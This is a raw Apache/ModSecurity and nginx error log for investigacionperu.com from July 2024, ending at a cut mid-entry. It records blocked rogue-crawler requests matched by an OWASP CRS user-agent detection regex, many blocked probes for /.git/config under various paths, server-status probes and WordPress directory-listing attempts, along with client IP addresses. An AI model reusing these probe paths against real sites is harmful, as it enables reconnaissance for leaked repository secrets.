"(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZoWZBFXDEc53dRKxAdCekgAAAA8"] [Wed Jul 03 13:31:32.117161 2024] [:error] [pid 2182:tid 140082522593024] [client 84.239.43.183:38110] [client 84.239.43.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZoWZBFXDEc53dRKxAdCekwAAAAs"] [Wed Jul 03 13:31:32.432331 2024] [:error] [pid 2182:tid 140082687149824] [client 84.239.43.183:38112] [client 84.239.43.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZoWZBFXDEc53dRKxAdCelAAAAAA"] [Wed Jul 03 13:31:33.780002 2024] [:error] [pid 2182:tid 140082413487872] [client 84.239.43.183:38114] [client 84.239.43.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZoWZBVXDEc53dRKxAdCelQAAABg"] [Wed Jul 03 13:31:34.439399 2024] [:error] [pid 2182:tid 140082514200320] [client 84.239.43.183:38116] [client 84.239.43.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZoWZBlXDEc53dRKxAdCelgAAAAw"] [Wed Jul 03 13:31:42.433494 2024] [:error] [pid 2182:tid 140082572949248] [client 84.239.43.183:38118] [client 84.239.43.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZoWZDlXDEc53dRKxAdCelwAAAAU"] [Wed Jul 03 13:31:42.461654 2024] [:error] [pid 2182:tid 140082556163840] [client 84.239.43.183:38120] [client 84.239.43.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZoWZDlXDEc53dRKxAdCemAAAAAc"] [Wed Jul 03 13:31:42.563618 2024] [:error] [pid 2182:tid 140082497414912] [client 84.239.43.183:38122] [client 84.239.43.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZoWZDlXDEc53dRKxAdCemQAAAA4"] [Wed Jul 03 13:31:43.645080 2024] [:error] [pid 2182:tid 140082472236800] [client 84.239.43.183:38124] [client 84.239.43.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZoWZD1XDEc53dRKxAdCemgAAABE"] [Wed Jul 03 13:31:44.361320 2024] [:error] [pid 2182:tid 140082539378432] [client 84.239.43.183:38126] [client 84.239.43.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZoWZEFXDEc53dRKxAdCemwAAAAk"] [Wed Jul 03 13:31:46.033480 2024] [:error] [pid 2184:tid 140082430273280] [client 84.239.43.183:38128] [client 84.239.43.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZoWZElze_JHJHWt-wlAjKQAAAFY"] [Wed Jul 03 13:31:47.205419 2024] [:error] [pid 2806:tid 140082421880576] [client 84.239.43.183:38130] [client 84.239.43.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZoWZE84xnUT0_h2DoW24hQAAANc"] [Wed Jul 03 13:31:47.331876 2024] [:error] [pid 2182:tid 140082421880576] [client 84.239.43.183:38132] [client 84.239.43.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZoWZE1XDEc53dRKxAdCenAAAABc"] 2024/07/03 18:41:54 [error] 2142#2142: *119038 access forbidden by rule, client: 45.58.127.143, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jul 03 19:03:34.621031 2024] [ssl:warn] [pid 2165:tid 140082869897088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 03 22:37:39.508916 2024] [authz_core:error] [pid 28105:tid 140082572949248] [client 167.172.158.128:47946] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/03 22:37:43 [error] 28072#28072: *121748 access forbidden by rule, client: 167.172.158.128, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jul 03 23:19:47.795481 2024] [authz_core:error] [pid 28307:tid 140082447058688] [client 206.81.24.227:48798] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/03 23:19:51 [error] 28073#28073: *122224 access forbidden by rule, client: 206.81.24.227, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jul 04 00:52:36.953460 2024] [authz_core:error] [pid 28104:tid 140082497414912] [client 159.203.96.42:50242] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/04 00:52:40 [error] 28073#28073: *122799 access forbidden by rule, client: 159.203.96.42, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Jul 04 03:31:21.126653 2024] [ssl:warn] [pid 19719:tid 140495237732224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 04 03:31:29.360874 2024] [ssl:warn] [pid 19725:tid 140495237732224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 04 03:31:29.858337 2024] [ssl:warn] [pid 19725:tid 140495237732224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 04 03:31:32.754275 2024] [ssl:warn] [pid 19725:tid 140495237732224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 04 03:31:35.146464 2024] [ssl:warn] [pid 20144:tid 139912322807680] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 04 03:31:47.611784 2024] [ssl:warn] [pid 20146:tid 139912322807680] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 05 03:30:27.545113 2024] [ssl:warn] [pid 1585:tid 140511674476416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 05 03:30:43.995711 2024] [ssl:warn] [pid 1589:tid 140511674476416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 05 03:30:44.590326 2024] [ssl:warn] [pid 1589:tid 140511674476416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 05 03:30:47.774579 2024] [ssl:warn] [pid 1589:tid 140511674476416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 05 03:30:50.084545 2024] [ssl:warn] [pid 2036:tid 140324702406528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 05 03:31:02.470050 2024] [ssl:warn] [pid 2039:tid 140324702406528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 05 17:34:36.040638 2024] [autoindex:error] [pid 2392:tid 140324519659264] [client 43.157.25.217:53906] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jul 05 17:34:44.539238 2024] [autoindex:error] [pid 2057:tid 140324408116992] [client 43.157.25.217:53910] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jul 05 17:35:07.396749 2024] [autoindex:error] [pid 2392:tid 140324248655616] [client 43.157.25.217:53924] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jul 05 17:35:47.837107 2024] [autoindex:error] [pid 2059:tid 140324257048320] [client 43.157.25.217:53946] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jul 05 22:59:04.477327 2024] [authz_core:error] [pid 2059:tid 140324349368064] [client 139.162.141.82:59466] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/05 22:59:07 [error] 1921#1921: *142364 access forbidden by rule, client: 139.162.141.82, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Jul 05 23:31:12.515914 2024] [authz_core:error] [pid 2392:tid 140324282226432] [client 139.59.143.102:59960] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/05 23:31:16 [error] 1922#1922: *142622 access forbidden by rule, client: 139.59.143.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Jul 06 03:33:56.404331 2024] [ssl:warn] [pid 15677:tid 140600646231936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 06 03:34:05.676240 2024] [ssl:warn] [pid 15682:tid 140600646231936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 06 03:34:06.072638 2024] [ssl:warn] [pid 15682:tid 140600646231936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 06 03:34:07.723409 2024] [ssl:warn] [pid 15682:tid 140600646231936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 06 03:34:10.003659 2024] [ssl:warn] [pid 16102:tid 139859801003904] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 06 03:34:22.349687 2024] [ssl:warn] [pid 16108:tid 139859801003904] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/07/06 03:46:38 [error] 15985#15985: *144440 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /vendor/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144441 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /wp-content/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144445 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /www/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144443 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144442 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /wp-content/plugins/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144444 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /git/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144440 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144446 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /site/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144441 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144443 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /http/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144445 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /var/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144442 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /htdocs/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144444 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /home/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144440 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /assets/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144443 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /s3/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144446 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /dev/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144441 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /wiki/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144442 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /wp-content/themes/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144445 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /css/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144444 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /web/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144440 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /login/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144443 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /index/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144441 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /backend/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/06 03:46:38 [error] 15985#15985: *144446 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /back/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sat Jul 06 09:08:51.215930 2024] [autoindex:error] [pid 16781:tid 139859444336384] [client 4.227.89.165:38914] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jul 06 10:08:58.538871 2024] [authz_core:error] [pid 16130:tid 139859368802048] [client 164.92.107.174:39742] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/06 10:09:02 [error] 15985#15985: *146949 access forbidden by rule, client: 164.92.107.174, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Jul 06 15:14:28.507768 2024] [autoindex:error] [pid 16129:tid 139859435943680] [client 185.205.246.107:44654] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jul 06 15:14:33.756724 2024] [autoindex:error] [pid 16129:tid 139859402372864] [client 185.205.246.107:44658] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jul 06 15:14:45.411027 2024] [autoindex:error] [pid 16130:tid 139859385587456] [client 185.205.246.107:44668] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jul 06 15:14:58.010217 2024] [autoindex:error] [pid 16128:tid 139859477907200] [client 185.205.246.107:44688] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jul 06 15:15:18.595229 2024] [autoindex:error] [pid 16781:tid 139859352016640] [client 185.205.246.107:44696] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index 